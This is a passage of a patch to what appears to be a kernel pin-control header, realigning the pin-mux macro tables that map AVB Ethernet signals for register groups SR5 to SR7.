++#define IP1SR5_15_12	FM(AVB2_TD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_19_16	FM(AVB2_TD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_23_20	FM(AVB2_RD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_27_24	FM(AVB2_RD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR5_31_28	FM(AVB2_TD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR5_3_0	FM(AVB2_TXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_7_4	FM(AVB2_RD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_11_8	FM(AVB2_RXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_15_12	FM(AVB2_TX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR5_19_16	FM(AVB2_RX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR6 */
+-/* IP0SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR6_3_0	FM(AVB1_MDIO)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_7_4	FM(AVB1_MAGIC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_11_8	FM(AVB1_MDC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_15_12	FM(AVB1_PHY_INT)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_19_16	FM(AVB1_LINK)		FM(AVB1_MII_TX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_23_20	FM(AVB1_AVTP_MATCH)	FM(AVB1_MII_RX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_27_24	FM(AVB1_TXC)		FM(AVB1_MII_TXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR6_31_28	FM(AVB1_TX_CTL)		FM(AVB1_MII_TX_EN)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR6_3_0	FM(AVB1_RXC)		FM(AVB1_MII_RXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_7_4	FM(AVB1_RX_CTL)		FM(AVB1_MII_RX_DV)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_11_8	FM(AVB1_AVTP_PPS)	FM(AVB1_MII_COL)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_15_12	FM(AVB1_AVTP_CAPTURE)	FM(AVB1_MII_CRS)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_19_16	FM(AVB1_TD1)		FM(AVB1_MII_TD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_23_20	FM(AVB1_TD0)		FM(AVB1_MII_TD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_27_24	FM(AVB1_RD1)		FM(AVB1_MII_RD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR6_31_28	FM(AVB1_RD0)		FM(AVB1_MII_RD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR6 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR6_3_0	FM(AVB1_TD2)		FM(AVB1_MII_TD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_7_4	FM(AVB1_RD2)		FM(AVB1_MII_RD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_11_8	FM(AVB1_TD3)		FM(AVB1_MII_TD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_15_12	FM(AVB1_RD3)		FM(AVB1_MII_RD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR6_19_16	FM(AVB1_TXCREFCLK)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR6_3_0	FM(AVB1_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_7_4	FM(AVB1_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_11_8	FM(AVB1_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_15_12	FM(AVB1_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_19_16	FM(AVB1_LINK)		FM(AVB1_MII_TX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_23_20	FM(AVB1_AVTP_MATCH)	FM(AVB1_MII_RX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_27_24	FM(AVB1_TXC)		FM(AVB1_MII_TXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR6_31_28	FM(AVB1_TX_CTL)		FM(AVB1_MII_TX_EN)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR6_3_0	FM(AVB1_RXC)		FM(AVB1_MII_RXC)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_7_4	FM(AVB1_RX_CTL)		FM(AVB1_MII_RX_DV)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_11_8	FM(AVB1_AVTP_PPS)	FM(AVB1_MII_COL)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_15_12	FM(AVB1_AVTP_CAPTURE)	FM(AVB1_MII_CRS)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_19_16	FM(AVB1_TD1)		FM(AVB1_MII_TD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_23_20	FM(AVB1_TD0)		FM(AVB1_MII_TD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_27_24	FM(AVB1_RD1)		FM(AVB1_MII_RD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR6_31_28	FM(AVB1_RD0)		FM(AVB1_MII_RD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR6 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR6_3_0	FM(AVB1_TD2)		FM(AVB1_MII_TD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_7_4	FM(AVB1_RD2)		FM(AVB1_MII_RD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_11_8	FM(AVB1_TD3)		FM(AVB1_MII_TD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_15_12	FM(AVB1_RD3)		FM(AVB1_MII_RD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR6_19_16	FM(AVB1_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR7 */
+-/* IP0SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR7_3_0	FM(AVB0_AVTP_PPS)	FM(AVB0_MII_COL)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_7_4	FM(AVB0_AVTP_CAPTURE)	FM(AVB0_MII_CRS)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_11_8	FM(AVB0_AVTP_MATCH)	FM(AVB0_MII_RX_ER)	FM(CC5_OSCOUT)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_15_12	FM(AVB0_TD3)		FM(AVB0_MII_TD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_19_16	FM(AVB0_LINK)		FM(AVB0_MII_TX_ER)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_23_20	FM(AVB0_PHY_INT)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_27_24	FM(AVB0_TD2)		FM(AVB0_MII_TD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR7_31_28	FM(AVB0_TD1)		FM(AVB0_MII_TD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR7_3_0	FM(AVB0_RD3)		FM(AVB0_MII_RD3)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_7_4	FM(AVB0_TXCREFCLK)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_11_8	FM(AVB0_MAGIC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_15_12	FM(AVB0_TD0)		FM(AVB0_MII_TD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_19_16	FM(AVB0_RD2)		FM(AVB0_MII_RD2)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_23_20	FM(AVB0_MDC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_27_24	FM(AVB0_MDIO)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR7_31_28	FM(AVB0_TXC)		FM(AVB0_MII_TXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR7 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR7_3_0	FM(AVB0_TX_CTL)		FM(AVB0_MII_TX_EN)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_7_4	FM(AVB0_RD1)		FM(AVB0_MII_RD1)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_11_8	FM(AVB0_RD0)		FM(AVB0_MII_RD0)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_15_12	FM(AVB0_RXC)		FM(AVB0_MII_RXC)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR7_19_16	FM(AVB0_RX_CTL)		FM(AVB0_MII_RX_DV)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR7_3_0	FM(AVB0_AVTP_PPS)	FM(AVB0_MII_COL)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_7_4	FM(AVB0_AVTP_CAPTURE)	FM(AVB0_MII_CRS)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_11_8	FM(AVB0_AVTP_MATCH)	FM(AVB0_MII_RX_ER)	FM(CC5_OSCOUT)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_15_12	FM(AVB0_TD3)		FM(AVB0_MII_TD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_19_16	FM(AVB0_LINK)		FM(AVB0_MII_TX_ER)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_23_20	FM(AVB0_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_27_24	FM(AVB0_TD2)		FM(AVB0_MII_TD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR7_31_28	FM(AVB0_TD1)		FM(AVB0_MII_TD1)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR7 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR7_3_0	FM(AVB0_RD3)		FM(AVB0_MII_RD3)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_7_4	FM(AVB0_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_11_8	FM(AVB0_MAGIC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_15_12	FM(AVB0_TD0)		FM(AVB0_MII_TD0)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_19_16	FM(AVB0_RD2)		FM(AVB0_MII_RD2)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_23_20	FM(AVB0_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR7_27_24	FM(AVB0_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
